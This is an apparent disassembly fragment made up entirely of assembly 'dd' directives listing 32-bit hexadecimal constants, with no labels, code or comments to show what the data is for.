		dd 0ED915ECCh, 0AB24F50Dh, 0D6F0FE15h, 772D91B9h, 0A87DC4A1h
		dd 32FE9784h, 96AC5317h, 63E47FC7h, 41A5B19Ah, 10CCB53Bh
		dd 0E18EFF0Dh, 81608B83h, 1333BBB9h, 3BCB25B8h,	6FA1E3B6h
		dd 0AA55F84Fh, 0FECC378Ch, 54856773h, 9D48BB9Fh, 26A5F09Ch
		dd 473497E7h, 0EDA50164h, 789D305Fh, 0B2E81805h, 0A941F4B3h
		dd 0DFE87E26h, 5EE20809h, 443F227Dh, 82E1945Fh,	8688C59Fh
		dd 0AC9B6893h, 0A7D16AACh, 4EAAF93h, 133B7DE2h,	7FBC5A6Dh
		dd 382478FBh, 69B8DDCEh, 7C013EF5h, 0A0310115h,	0F02C4EF6h
		dd 64EE758h, 7F6AB9C7h,	0FB0CF071h, 0CA673A27h,	25A02DCAh
		dd 593E2769h, 0B4C3E616h, 36A4BB59h, 0ACC0824Ah, 175C11A3h
		dd 260BAC2Eh, 0CD495FAEh, 7E4B7054h, 0A152E4F5h, 0D770ED74h
		dd 44212FA5h, 0DE008DBDh, 152AF82Ch, 15955614h,	0EF8B7F8Dh
		dd 17F70E3Fh, 0B32BDB8Fh, 6E35E2E1h, 0D2B7E818h, 0E57312C2h
		dd 0F0F5CFAAh, 4D17E341h, 2B77F508h, 8D97BBFBh,	2FEB0C4Eh
		dd 698DE502h, 6F10F2CCh, 0ED34769Dh, 1DD52478h,	0D5E638D4h
		dd 0CF03E010h, 59A6C3E4h, 0B0D9643Eh, 5FE7E8A5h, 2BF78585h
		dd 52F11C3Bh, 72F699F1h, 0ED1EBC27h, 5A2E8445h,	85778315h
		dd 89CB8A25h, 32A93593h, 2341015Ah, 5998B35Ch, 94538DB8h
		dd 0C70FB2E6h, 1F666E96h, 8D07EE0Ch, 2D2619BDh,	0DBF68159h
		dd 942DD9B9h, 0F10FA525h, 0EAD8C147h, 0C0050DC4h, 3299BF9Bh
		dd 60DBA259h, 4858D41Dh, 3E54B4EAh, 4BCF1D81h, 0CBA080CEh
		dd 0DC0DF284h, 6D032DE6h, 9F03BE2Eh, 0A375E357h, 60540A85h
		dd 4A85F4AEh, 0BAE3D4Eh, 0F5C52425h, 41220B69h,	0BD9F9984h
		dd 0ADB368Ah, 9E3F3DA9h, 579F0378h, 694A456Bh, 52E85F24h
		dd 0C415C889h, 0A6FD9592h, 209C496h, 0D8055FF3h, 48039DA6h
		dd 56DA77CAh, 91EF51A7h, 792F6065h, 0FE4B6D19h,	3BB8E638h
		dd 777AA7F2h, 549AD811h, 0C1AA7549h, 7BD6D19Fh,	0D1D4B3F2h
		dd 0EFF628AAh, 0BAF71F07h, 0E5B3CAD8h, 2E76724Dh, 1AA74988h
		dd 8BFC4CAAh, 168F2B37h, 2A5FE07Dh, 3B4F372Eh, 0A14CF1Eh
		dd 3925B6A9h, 6AD6DCE0h, 1A3FFEFAh, 0A307720Ah,	0E255BF6Dh
		dd 0FF399512h, 0ACFE7E5Ah, 0C62992FDh, 0B9ED78FBh, 0A948E18Ch
		dd 717D12E9h, 0A1B84F3Dh, 24187205h, 40D9CDC4h,	0C3787DBDh
		dd 2517B3ADh, 8F53E7EAh, 568905DFh, 94111917h, 0A38DEF9Ch
		dd 1FE88941h, 7752CC5Bh, 0EB5026E4h, 0BCCB16Bh,	8FE8FC4Eh
		dd 0FE0BB9A6h, 9D7CE691h, 195CE56h, 5A3250B0h, 0DEFBDFE2h
		dd 0E73C59EBh, 0C4A2333Bh, 46EE6949h, 548C09A1h, 0FBC2F7C0h
		dd 97D3EA07h, 8D1EBBC0h, 0BE81C00Ch, 3F20322h, 64B6286Fh
		dd 9568678h, 2469FFBFh,	5799AECCh, 0CDAA691Ah, 7A2A5FDAh
		dd 154D7505h, 260BE7CBh, 0E52D889Eh, 5349B45Ah,	6063D6B4h
		dd 0E01F285Eh, 0F13E5419h, 0EA4651B6h, 0DEBB561Eh, 15D11F83h
		dd 6915DBE6h, 0A350D6CCh, 6C9560CAh, 8446092Eh,	3DA4BB48h
		dd 0A5C80289h, 6D4E28CFh, 0A6ADDA21h, 8BB90B71h, 0F0AF034h
		dd 9C0E6798h, 64A122BBh, 3ECD5680h, 0DA2CE87Eh,	19329C6Bh
		dd 0BDDAA749h, 0CAF61B85h, 41D42E6Ch, 0C5F85FEDh, 5F976FF0h
		dd 0B15ED1EBh, 460B0624h, 0CF9701CEh, 0A70AB1CCh, 0A221F86Bh
		dd 0F4859BA7h, 7CC554EDh, 7F87679Fh, 0CB24D322h, 945D7F3Ch
		dd 0AB97CD6Eh, 5CF7B40h, 0F87B5146h, 443EE06Eh,	0EAD0BC1Eh
		dd 0D551AD68h, 5D77A0DCh, 0F1ADCFBh, 9D58F18Eh,	0FC62166Bh
		dd 314C97EDh, 0E8B4D94Ah, 0E7177FA3h, 0EE725D59h, 0DC48ECEBh
		dd 0B5514536h, 45F5E7BEh, 3B86B109h, 7F52351Ch,	6691B70Bh
		dd 3D2D5767h, 0FEADF470h, 8EEFA6BEh, 0AA7F3F12h, 0E6339DC1h
		dd 0FABC4F6Fh, 6CB5E0C0h, 5300379Bh, 6E965D1Eh,	2C7508A7h
		dd 3CD78A69h, 563E3876h, 48E76986h, 0ABCE369Ah,	519003E2h
		dd 26B73CA0h, 3A9F5817h, 42F8C87Eh, 8060610h, 0AD1DCEDCh
		dd 8D16303Fh, 815F2E79h, 0C7E79AE7h, 69F64DF4h,	0DA7F1445h
		dd 0E10BFE27h, 97E7E3DBh, 0AD55E753h, 0FBB5CBD1h, 5081171Bh
		dd 0FB3F4690h, 0F157A383h, 75169681h, 9EF34A82h, 460C3C14h
		dd 0E568167Ch, 404BF9Eh
		dd 0E787CA43h, 0D063A53Ch, 5B69BD31h, 5C41BD01h, 0F20A0C18h
		dd 0D18D6AC9h, 7A4344Eh, 0D2A5C92Ah, 0F6D0B32Eh, 0AF616149h
		dd 451A49A8h, 2B25F48Dh, 32D2AD5Bh, 3F05AE39h, 0B3141F3Ch
		dd 671A7156h, 0F8C3B54Fh, 0AC0ED126h, 5B0E728Eh, 85166670h
		dd 0E767BF07h, 0A704081Eh, 479716ABh, 9AB3ED2Fh, 0AAD8A71Bh
		dd 18E79A57h, 3C19BF90h, 0E33A94D4h, 2E3C08C7h,	0EE147A1Eh
		dd 42CF5929h, 9A51B209h, 0A5CCC2DFh, 12343C2h, 0AAF78465h
		dd 9ADDEB2Bh, 0FBD4D770h, 0FD7A6927h, 0B2880347h, 5AD458EFh
		dd 0DB81D709h, 0F6ECDD8Ah, 374CC49Eh, 1A8D15DBh, 4D9663CDh
		dd 0D550EC95h, 0ECA8A2C0h, 568E742Fh, 71BF5D95h, 0E58AEA9Fh
		dd 2692A7Ah, 223B5E63h,	0A5ABC8F0h, 9390AC32h, 5D1C20ECh
		dd 21CA7F33h, 0B3BA4E3Ah, 526ABE18h, 0B7EAD1ACh, 78A6A529h
		dd 0AFAD091Ch, 4911078Bh, 0A86E52BEh, 8E5AE929h, 86A12B1Dh
		dd 0F023655Eh, 0A0833180h, 0BAF15BA7h, 0ECEB81A9h, 0C1C7E201h
		dd 175BF70Fh, 0D637DE75h, 8302859Dh, 8BA9BD24h,	0B2778FCAh
		dd 88BFE371h, 0D78D0894h, 9D6ABB71h, 73161AFBh,	0C11ACC6Ah
		dd 4EFFD424h, 0DBAA8D24h, 909A5756h, 0DD80FEA1h, 0D45A2641h
		dd 6777EF9Dh, 85682BD7h, 7E972453h, 34C89E66h, 3BE2B753h
		dd 15B071EDh, 0FDE0FCFFh, 66D1370Bh, 0D7689BDCh, 0DD7AE499h
		dd 0CE0CFAA1h, 3CAC30C0h, 39441655h, 0DDFCA2C7h, 0E3AE9ED6h
		dd 0E5C32F49h, 0AB21C469h, 7E1240FBh, 0DFCD946Dh, 4B0AE687h
		dd 181A3627h, 70158A3Eh, 0ED1DF1F8h, 0BACF89EBh, 0A9627ADAh
		dd 0C126495Fh, 5DB4FA2Ah, 5C5A27D9h, 9B7C55B7h,	0A88FE3ADh
		dd 352697D4h, 0B35ABED5h, 755960A7h, 15520941h,	765475Dh
		dd 4B2FF349h, 14455463h, 0A0F84DDFh, 963659C9h,	0A009BE0Fh
		dd 47DD57FAh, 8DD97799h, 712090ABh, 0A65D6E7Bh,	0ACA77550h
		dd 0E94AEC81h, 0A95AE131h, 0C894B751h, 0B1812D70h, 7FB342B4h
		dd 19A7E9FBh, 1B531E47h, 0A26B615Bh, 0A5C985F3h, 0B52AA025h
		dd 0FB433A85h, 1EA3EF81h, 76D1EA3Fh, 2F339A36h,	746FF8B3h
		dd 0DEC8A6D7h, 0B77581F1h, 5AEE2B72h, 0A9960DA5h, 0A4FF9D7h
		dd 959B9F48h, 1B9B3593h, 0C0D60E1Fh, 9472CEFFh,	81E0EFB8h
		dd 5CDFE1C5h, 81E44B3h,	0EAB9C283h, 0DDE03FACh,	6287D061h
		dd 0FBF7DA4Bh, 8944E06Bh, 956641CBh, 66B2F74Fh,	75309A67h
		dd 6A1F6D10h, 0C7416C9Ch, 7EEE82E5h, 5532C2D1h,	527EDF6h
		dd 6B7FB5Ch, 0BFC7C0EAh, 0DC50F4C3h, 27149D90h,	0B752B258h
		dd 1D51425Fh, 94C5CCB4h, 0C2FF59B3h, 0BF14184Bh, 17827D36h
		dd 0A84DF151h, 7B7042A0h, 0BDDCA25Dh, 133C185Fh, 0C090A8CAh
		dd 0C73CDD54h, 0BF82D62Eh, 36B5FCAh, 1F8C598Bh,	1E76FE5Ah
		dd 5005C1E0h, 14174F3Dh, 1C1A70F1h, 69926960h, 367E8483h
		dd 8BB5EDD1h, 907AC7C9h, 6DD0655Eh, 174FEAFFh, 0E7B2EDC2h
		dd 0B7850234h, 4782BEF2h, 0B56F6471h, 9C3FD3C1h, 0FBBD2A5h
		dd 96C17533h, 80C75682h, 0DC6A9E33h, 0F55CBB0Ah, 2C70DCC6h
		dd 5B748ECh, 3F1B7F7Eh,	0B453286Ch, 8942AFAAh, 0B8126ABBh
		dd 5B8F66B8h, 0DF018807h, 214273F5h, 0E53E761h,	0D7BAFB58h
		dd 0DAA3FC3Dh, 1DFFC6FEh, 4E40CE77h, 7437B8EEh,	154D0572h
		dd 2AC8D653h, 0D5DFC28Dh, 9867AACCh, 0A7A0159h,	0DDB76A03h
		dd 7F62A0Eh, 56E245ABh,	2737E189h, 9D20A368h, 3F29C659h
		dd 928A8BD7h, 75FE07E0h, 0B8893C85h, 0B67FC33h,	95B957A8h
		dd 7670F320h, 0C041CD95h, 52CF2FF4h, 0F8ED915Ch, 0F242CE21h
		dd 0E8472AF8h, 21EAD793h, 0E5AFE46Bh, 781B4F91h, 56E19239h
		dd 484E4B3Dh, 746B8875h, 0C286B441h, 91C414B5h,	0D06DA479h
		dd 48E0A934h, 354C28F1h, 4524368Ah, 0E7543389h,	5FA3A840h
		dd 0D6F695FCh, 29CFAA87h, 456096A6h, 0DFABCB23h, 9ACD81Fh
		dd 878BBFB9h, 0F94A1F87h, 4BCCFC46h, 7666E4EDh,	0E1A42BC1h
		dd 55AC18AFh, 0FC94E021h, 0F58D746h, 0B4BD1B07h, 0FE8CD4F1h
		dd 3E98C7C0h, 639B6E28h, 0A1990E22h, 69DF22BFh,	34914013h
		dd 581F1C1Eh, 3D8C142Ah, 59B78E77h, 0A471863Fh,	0C4737F22h
		dd 74857FABh, 2BDBD5E7h, 9C5B4D3Dh, 0D0DAA00Ah,	7F7EF509h
		dd 0DE06388Fh, 0B64D5165h, 91236A8Eh, 0AC452054h, 2D4DF8BAh
		dd 7C33DC18h, 36C33CD5h, 0D97FBA84h, 381292A1h,	0A9DDA0D0h
		dd 0F90C386Fh, 1974482Ah, 149AA1E0h, 0AB0BC9FAh, 0AFF4456Ch
		dd 68DEE113h, 9406A6EDh, 0D9F4D1E2h, 0B55BBEA4h, 918AB47Eh
		dd 0FA3D60CEh, 0ADB4E10Bh, 893AB9BBh, 2782BF22h, 0AB57E208h
		dd 0CEA22D2Fh, 70CF058Bh, 0EE9F2E4Fh, 983A8C03h, 0BBDE094Ah
		dd 0F64DCA6Dh, 0EE75EDFEh, 52EF0814h, 5A3A987Fh, 713B10B5h
		dd 67EAA26Bh, 9B37D0FCh, 0DAE3B8EBh, 0F448615Bh, 0DBACDFAh
		dd 0E9268386h, 4652BABEh, 0B92F956Bh, 6718794Eh, 6D658597h
		dd 3D88B5FBh, 28872957h, 20BD623Ch, 5E68241Dh, 724FE1F4h
		dd 930F2AC0h, 0F7DB7C0Ch, 43F00227h, 403A51ADh,	36A2193Eh
		dd 95A12A69h, 60286481h, 97A1499Fh, 0BECBB6B3h,	4543ED73h
		dd 0A4AFB6DDh, 7C205B0Ah, 0FD39B1CAh, 7A617BBDh, 0DA337504h
		dd 6DB909A9h, 1369D359h, 0B0B2D5B9h, 0B2C71550h, 2D4DD123h
		dd 60D36BD4h, 1F5CF47Ah, 0B55BEF1Dh, 0E616AA17h, 4522CEFAh
		dd 665512E4h, 7BD82BE5h, 191C61C0h, 0E225EA34h,	0A66CC6BEh
		dd 0FCF298E2h, 5438272Fh, 8BC19337h, 4F592D31h,	5EE7FF5h
		dd 0AF9B8ED3h, 0B8D0F6C8h, 2B410D1Dh, 3A5A31B5h, 4223AF91h
		dd 5AD9836h, 0B0B916C9h, 0E12EEB8Ah, 1BD41F98h,	30FCA05Bh
		dd 0BE22CCFBh, 65E6D33h, 75229F7Eh, 0D31BA5D4h,	5A342D3Dh
		dd 5F2555F6h, 30DAD829h, 95B1D448h, 0FF27DB67h,	0BEF8B7Ch
		dd 0AF2FCA03h, 0DCCD0E72h, 0ACF6D9E8h, 0BEAD67Fh, 3294E51Bh
		dd 0A7DD4A92h, 7ED80826h, 0CAFFB2E8h, 96778E0Ch, 5748DF2h
		dd 7818848Ch, 95E336Eh,	0FD957392h, 3598BD55h, 5A77C69Bh
		dd 0E5431E5Eh, 3B582275h, 5DA3BB85h, 0F89943EFh, 70B06897h
		dd 0D1B3A5D7h, 17CCABCBh, 0D4FAC7ADh, 0BEC3BC73h, 3A6E9368h
		dd 13706C10h, 0A18E0C3Fh, 7134F503h, 26FA2C67h,	0B2CBEE9Bh
		dd 1FA4C799h, 0FDA063DCh, 386BB1C5h, 37C6195Dh,	0AB5C74AAh
		dd 30BF5DE7h, 6391A7B1h, 0EAE9DF46h, 96BB3182h,	0A6FBAB37h
		dd 0F4ACDDCEh, 5274852Ch, 617FF944h, 81C27FDCh,	0F3C17D0Fh
		dd 7265E417h, 2B377F5Ah, 3072FEFDh, 68BA3CA0h, 0EE94237Fh
		dd 2704C819h, 6402BF90h, 9E63A415h, 7C57BDD5h, 4F55913Ch
		dd 9A65F612h, 0F0A095A5h, 373CAE0h, 0C3F0D8B3h,	42D0F080h
		dd 82813E2Bh, 0DEFB61Eh, 0EA6AAA5Eh, 0BA92C4BDh, 0B333D8BFh
		dd 23BD745Eh, 96E6E05Ah, 4882F053h, 970FF07Ch, 7E92AB9Fh
		dd 65627D90h, 0E323A9F8h, 5BC698E6h, 60E81AEFh,	25EAA3EFh
		dd 0B9FF5492h, 0E7FA942Fh, 0E2099BC9h, 0AD733686h, 0F883B1BDh
		dd 0A0547DE1h, 71F85FB1h, 0C3CDF37h, 31047545h,	91702B13h
		dd 5945CABFh, 52EA0925h, 431735CCh, 0F36CD709h,	0A48AC030h
		dd 4544C141h, 5A8C69D5h, 1A83D8C2h, 0AD63C4AFh,	57F6B5Bh
		dd 5DCD68B9h, 130314C0h, 0E3910A46h, 6862BC0Fh,	35CD2FC0h
		dd 0D546EA19h, 40B33A0Dh, 46C0BEDDh, 3CDFC99Fh,	91387F30h
		dd 0D76FB2h, 1D0C95F6h,	5722D785h, 618CBD4Ch, 91386EF1h
		dd 294F962Ch, 60788165h, 337BA18Bh, 0CFCA3BB3h,	0D28C717Fh
		dd 0DFCEA32Bh, 4B20354Dh
		dd 1D5C13FAh, 4FF5AF9Fh, 2E075C49h, 0D9274A9Eh,	0EC3A1FF9h
		dd 57A4347Dh, 0D5DD97B2h, 0BE472B1Dh, 934F0E11h, 62C97F81h
		dd 6ABAC972h, 921C0527h, 2A8E8D2Fh, 4770C36Ah, 24BDB90Fh
		dd 4C84252Dh, 914D445Fh, 2FA6AAE1h, 4B68FC3Dh, 3E32C80Ah
		dd 0E8399434h, 0EEFA9BEAh, 1CD86AF3h, 2B7525F0h, 0E65F7C40h
		dd 1894C3D0h, 0A1190719h, 0B9C41BC2h, 3202BAEFh, 39B82AF2h
		dd 0C8CC2C87h, 7C8CE155h, 660F9D45h, 24B52377h,	6D1BBA49h
		dd 0AC7742D2h, 0EA6268B6h, 6F0F1A58h, 3A3C1477h, 0FC44E00Bh
		dd 138C5468h, 6AE0561h,	6FE53C0Ah, 0A00E03D2h, 2966A3DFh
		dd 0D5D4784Eh, 10435211h, 26D571DDh, 99540451h,	3A3F542h
		dd 0B4EFCE4Fh, 4D1AB376h, 4BDDBD32h, 57EA6E0h, 0C0A49690h
		dd 1EEDFAF1h, 0C5926903h, 0B8015657h, 0E73BF35Fh, 53556D7Ah
		dd 7B217F36h, 2AFF81E0h, 7EAEDAEAh, 9307A95h, 5E099292h
		dd 695A395h, 8B4788CCh,	0BAF6B70Ch, 575E723Dh, 0E55E2E9Eh
		dd 9F01BF81h, 577B0B61h, 974ACA95h, 1F274181h, 16B3BF3Bh
		dd 0F3075D91h, 0EE96F0FBh, 8EFF7E57h, 43F165E8h, 0A35C4F2Ah
		dd 305B30F7h, 0F181D479h, 699B4380h, 0E594FD43h, 131DAFE2h
		dd 6543554Eh, 0A8D17189h, 0FB74271Fh, 0B2EDF81Dh, 0D2F3D080h
		dd 51C1E795h, 5C5A503Ah, 0C12A2F51h, 0BCBABD6h,	0EB27E6Bh
		dd 57E4125Ah, 435167C1h, 7649FB71h, 2737B1A3h, 0C4A31BEEh
		dd 0FE6423B1h, 9DD6BBBDh, 914AD652h, 0BBDA2C43h, 0DF5276E2h
		dd 2896B974h, 111387BCh, 7F5BFBE5h, 0B5A7B1BAh,	0DDCFC936h
		dd 16D6E5EEh, 0F2A515CDh, 0CBB54330h, 3DC2D511h, 0A7171100h
		dd 848ACA1Eh, 9475D276h, 0A29F7D03h, 552474D7h,	60AD2B53h
		dd 0F5DB8E96h, 0C0DB4AD1h, 3F9FF9B7h, 0DC89DDD7h, 63B228EBh
		dd 349B57B4h, 67F12347h, 0AE8A8B8h, 7A9E30B8h, 4EC0C445h
		dd 1E047F18h, 82F7ABBCh, 0E2025147h, 627F59BCh,	2D5E071Dh
		dd 0F6F9ED95h, 3977E5C3h, 2D14AABDh, 0E18655B4h, 0C13EC5F5h
		dd 8626773Ch, 5FA3817Ah, 82CDB152h, 0FE83A886h,	0B699C7A2h
		dd 0C8B228E6h, 63C268B3h, 0F44C3BE5h, 2FC00581h, 0E9F2F51Bh
		dd 0AA8ABE4Fh, 0D8DA0B5Ah, 2E6CC985h, 733B2558h, 0DC0799ECh
		dd 23D81CF9h, 0C5FECBD1h, 0AE0BD473h, 0DF671CDFh, 1BB5E8A0h
		dd 0AE0E1D21h, 7FAD9855h, 15FE18D3h, 0F86D1D90h, 0DB47E6A1h
		dd 31DA93FEh, 12E1DE09h, 0EF4274C4h, 166A79D5h,	605D764Fh
		dd 0B695E4E5h, 0BA6DD059h, 56F03B45h, 5B754ACh,	2FFB3F3Eh
		dd 0AEB74FDDh, 32DFCEF8h, 0DCCE6571h, 1ABD5497h, 5A2F4DD4h
		dd 1D1C1CA8h, 0B8F31179h, 0D8BF5263h, 38176663h, 8A360AEFh
		dd 69CC28E6h, 0EF4A765Ah, 451A94B9h, 9A48C955h,	0C67C1F88h
		dd 0A3DC48BBh, 54C84B29h, 0CABE6C78h, 50311040h, 7E471C12h
		dd 8E22B1EAh, 0A4AB7277h, 0E0F2FDACh, 0E58DC19Ch, 2254021Bh
		dd 0FA830208h, 0CA08EA8Ah, 933508AAh, 4FA376D1h, 8DC5D07Dh
		dd 0EA818363h, 88FA974Bh, 0D6FA800Fh, 4C06BC38h, 1FE71541h
		dd 6B089DDFh, 0B430C976h, 8099CD9Eh, 54DE0472h,	189713E8h
		dd 0D6DF73B5h, 0AAF849B4h, 0CA66E1E6h, 0DD4E55FCh, 0FD4AE125h
		dd 0FEBC8DF9h, 0E3F42BFBh, 0F7FC0C6Ch, 0A37A099h, 0A5DBC63Ch
		dd 0BCAB15EAh, 0C230E627h, 0E23B4066h, 87E05587h, 87115FF1h
		dd 6A97E2F2h, 0F5DCCB77h, 0E1A2385h, 0D935E5BCh, 0FC3CD595h
		dd 0C7601FD6h, 41636529h, 0BAE864B9h, 0AA4BBA8Eh, 0E99F8A2Ch
		dd 0E313D552h, 78558EAh, 0A5DD92CFh, 77ECA68Dh,	0C2A4AC9Ah
		dd 50FE5741h, 0CCE6BD3Dh, 0E88DD427h, 0E220FF6Ch, 0C8623A62h
		dd 0F393A3D9h, 0CA0BBD9Bh, 91CA50Fh, 0DE38EEC5h, 637985BFh
		dd 57E8063Dh, 8F53CFB9h, 48B3CB6Dh, 0AE2DCC9Ch,	44A1FD76h
		dd 0EF569FCAh, 0FDB76A4h, 9E98F858h, 0E336507Bh, 0D0A1F7CEh
		dd 20D2BC65h, 4703B56Fh, 5675DFBFh, 0FCE8E6E8h,	0FABDB362h
		dd 1550CCF2h, 0C26D014Bh, 5EA64EF5h, 6BB4134Ch,	8EEA4F33h
		dd 7525B749h, 8BE0EF4Bh, 860B9EA9h, 6287D600h, 2AFCEC77h
		dd 2CF8165Eh, 0EB6D1E54h, 0CA93C84Bh, 9BE534DFh, 86D3429Ah
		dd 2EB8976Eh, 77DF4179h, 0E13E16D0h, 11242052h,	3CE06ED3h
		dd 193002CCh, 8E832E30h, 86EA402Fh, 57FB2B9Bh, 24825BA8h
		dd 4B4E5859h, 88538525h, 0B2BE227Ah, 0B625E806h, 1A5E9DACh
		dd 73437C4Bh, 584E2317h, 89F63FBFh, 0B8B7E369h,	2D1473AAh
		dd 13E2F6F2h, 45730917h, 0BB68EFF5h, 0D8B5C2B8h, 0A6B8F2CAh
		dd 6B03A313h, 0FB5577C1h, 0D2CE97E0h, 5D858403h, 0F4ABCE75h
		dd 791C9A93h, 0B675A20h, 0C5735FBCh, 5580B81Dh,	9A27C711h
		dd 40FB6AF6h, 348AC2CEh, 0C02CF81Eh, 0F2F3747h,	0EDA5FF5Eh
		dd 0FF69B685h, 0B8A48584h, 9DF37D32h, 0F332427Ah, 0E8B1A3DBh
		dd 384EA009h, 55DD79EDh, 20222BEh, 77C9CFB5h, 84D6B3DDh
		dd 0BC199144h, 0B3C59B7Ch, 322E259Bh, 83E0E456h, 6C3EB58Dh
		dd 51B44616h, 500138h, 7A6AA6Dh, 0CE1F76F3h, 0AFF4EB44h
		dd 0E27010E3h, 0FD1E4919h, 932A2705h, 1F5BBF2Dh, 703585BFh
		dd 3A04F63Bh, 481AAF0Ch, 0B62BAFBAh, 2FFE1CECh,	0B90FE7B0h
		dd 5292B85Fh, 2B0AA175h, 8A38B6C2h, 22A2A4B3h, 0A92D710Bh
		dd 9D7B2509h, 0CFA4277Dh, 2D987F1Fh, 0F11BB451h, 0DA5EC94Ah
		dd 7DDE042Fh, 3E2F361Ch, 71315A47h, 0FEFCE7BCh,	47D8D5B2h
		dd 0A7F34A9Bh, 5994BF3Ch, 9085F170h, 0EC8BD8D3h, 0C0FEF697h
		dd 5A3EF79Dh, 640D6936h, 2FB2A04Eh, 25A24261h, 0A816B192h
		dd 69B39E3Ah, 0C969D3E1h, 34C3FF0Ah, 0A60F0F28h, 577382DDh
		dd 36BB5112h, 60E68903h, 99EA235Fh, 0CBA469D3h,	284A220Ah
		dd 3D8548F1h, 65A44E16h, 4538EB4Ah, 9A3706CDh, 6E2354F6h
		dd 2FF12E8Ah, 0BBCCE791h, 0C42B27EAh, 3FED575Ah, 3803307Dh
		dd 1E07B7EFh, 0DFEF38CAh, 0BCF68598h, 50FE3C6Fh, 8C4E3A60h
		dd 0A750EBB9h, 0E8B2A4FBh, 0F0D04F3h, 0A9997E0Eh, 0D9FED656h
		dd 0BF9C0782h, 0F7E77C21h, 1667F519h, 335C9457h, 17785696h
		dd 7A948469h, 88630B25h, 982E4586h, 70E2BCE8h, 0D49B0FBDh
		dd 0EC9BE278h, 4A4682Ch, 6E24E911h, 0F03EE957h,	2A7DF05Eh
		dd 14B85E94h, 7B485F6Bh, 1F8C62D6h, 42F6E22h, 6A049C78h
		dd 316DCDC0h, 7D5DFD67h, 552A5C73h, 86933E4Eh, 21284C7Bh
		dd 824EEBC4h, 1B633703h, 0C06338FEh, 3989FD64h,	5793F956h
		dd 610C6300h, 0E0B8844Bh, 5D0E87E2h, 0B2431134h, 0C1D40A96h
		dd 1A2AC1E3h, 5CBD942Ch, 0F9E914C1h, 5DA9C068h,	2E85BE14h
		dd 6F367F1Dh, 96926C54h, 0DFBA44B8h, 7F71FC3Dh,	6ADFB1DDh
		dd 30B6CAC8h, 0CEE9E075h, 0A2D35511h, 0A1C59D97h, 3F277B77h
		dd 974226F2h, 727D4AD3h, 5CB6308Ch, 5B4C1153h, 25F5B5Eh
		dd 8C5EAD03h, 0A38A1997h, 5DAF3824h, 0BFE3361Ah, 0D25A5B56h
		dd 303FB5E7h, 0EC7D0AEFh, 0E774AC3Bh, 75E94A2Eh, 0EE56778Dh
		dd 0F77652D8h, 0F6EBEAD8h, 346F64EFh, 0E5C85CD3h, 0FC0CB13Bh
		dd 0AAF2FA70h, 5D6D775Ah, 9E877108h, 3A26A4A2h,	0F039E3A3h
		dd 38D7C7B8h, 3B686DFFh, 0B450D9F0h, 0D34997FFh, 362FA7E1h
		dd 0D6EF4E2Fh, 75F7E88Ah, 0A75ACD07h, 0E4674F37h, 0EA292D81h
		dd 4E95F493h, 85CD7FDEh, 73D50FD6h, 0F43A594Fh,	200AFDCDh
		dd 0F71FE5D6h, 11E54169h, 9C2A14CBh, 0FDFE3168h, 5A5995E9h
		dd 0F748615Dh, 0F709AE12h, 0D4220CB2h, 4A21FA7h, 91D732BDh
		dd 0CB1B9566h, 0E2E83196h
		dd 48124EA4h, 0BA5002B5h, 519357EEh, 5E5A5CF3h,	2D6BC9F8h
		dd 9D5724DEh, 8D9AA0EDh, 2FF01D0Ah, 607C2F3Fh, 0BEA99479h
		dd 0D7477573h, 50F5F9FCh, 4D8475AAh, 0E7B019A6h, 21A5945Bh
		dd 0F0FD9C3Ch, 0AFCA4094h, 74F60187h, 3ED887E3h, 50AC0430h
		dd 52E56C1Bh, 0F83CE441h, 0C4ADE21h, 6EAC2289h,	0F3206925h
		dd 0B6E2F1E2h, 85E73364h, 0F65760B7h, 895A24D8h, 2E50CD8Eh
		dd 9865DFF6h, 47560F6Eh, 86477D15h, 0E3BCA204h,	0E63ED17Fh
		dd 0DA18258Ah, 90FAB8A4h, 78BAB61Fh, 3763C369h,	43A10F21h
		dd 870754FFh, 24B058BEh, 0B40FCE3Dh, 72CBD596h,	0FAE84BF8h
		dd 0C86E456Ah, 115D129Fh, 0D7521EBAh, 97D6BE70h, 9790B725h
		dd 0D700446Bh, 16DD0554h, 96EEF72Dh, 0C6181184h, 6DA48D38h
		dd 0B31B80E1h, 5A3BDED7h, 69929576h, 0E152105Fh, 0F4D3FC2Eh
		dd 7EA77F75h, 0BB866B6Fh, 4B74683Bh, 0C3F38A3h,	0D8A8D7BEh
		dd 98630552h, 8B7422D0h, 0DD7A8FF5h, 0D616EE59h, 12BD1052h
		dd 89726C31h, 0A88EDA9Dh, 84B68558h, 7E13ADB8h,	0C2F77B8h
		dd 38797FAh, 7811F5AFh,	470898F0h, 0B76397DEh, 0F3E4C801h
		dd 1E6133C0h, 9AD0711Eh, 4C88CB4Bh, 7743A18Ch, 4E1AE6A1h
		dd 0DA58F9BDh, 6FC18EC6h, 41F7861Eh, 879CE346h,	4103010Eh
		dd 35EA7F3h, 0A2450BEEh, 0CD3FFDE5h, 0DFEF994Fh, 7C23B45Ch
		dd 86433FC8h, 934DB8A6h, 0EFB6A2BBh, 0F2ECBB90h, 0B56F940Eh
		dd 2C680362h, 315BA808h, 475A76F3h, 70017012h, 0E980D4D1h
		dd 0D93F4386h, 58F141D0h, 1FC8C0EDh, 0A4A386E6h, 7646D96Dh
		dd 3818167h, 0ED72862Eh, 8895E6C6h, 39F81F33h, 0D22FF429h
		dd 0C42B65A4h, 14A3BC4h, 0DF391925h, 0F3A70F98h, 97E10E5Fh
		dd 7D798ECBh, 0E0EED722h, 7A78B838h, 2DA64AA8h,	0C78F613Ch
		dd 0C14BF0BFh, 0D17DDEC3h, 0DF88F07Dh, 0B9AB0DF9h, 0C5EDCC92h
		dd 2D925979h, 385F104Ch, 9BA1C2A9h, 0AFEDE253h,	0EBA27F71h
		dd 47625E1Ah, 0E40304BDh, 356822CBh, 0B9193FE0h, 861F87F8h
		dd 9DC4B055h, 6D5F54B7h, 83D356C7h, 0A0518212h,	980E28AEh
		dd 811CE492h, 0ED155322h, 3828CC3Bh, 9F6043F0h,	5467364h
		dd 855A2481h, 0B46B957Dh, 2D534D97h, 7624E61Bh,	797FA7F3h
		dd 353A348Eh, 0F5E78587h, 8AAD9EABh, 0D57075B2h, 75059C4Ch
		dd 557CC1B4h, 5D7950E8h, 2B47D289h, 0B1B01C35h,	0AF397995h
		dd 0DA2059EAh, 0BF7A347Bh, 5F8B86EAh, 0B82BA3ABh, 51D82E1Ah
		dd 392A6482h, 675A94F7h, 89FE7091h, 0B6881004h,	215FE7D1h
		dd 8E3F5A0h, 5C811755h,	6E897AC5h, 43F1177Eh, 7A24490Dh
		dd 0F04DF1A5h, 22CC2F8Ch, 0D282D750h, 0DF8BEFBAh, 75A4FC69h
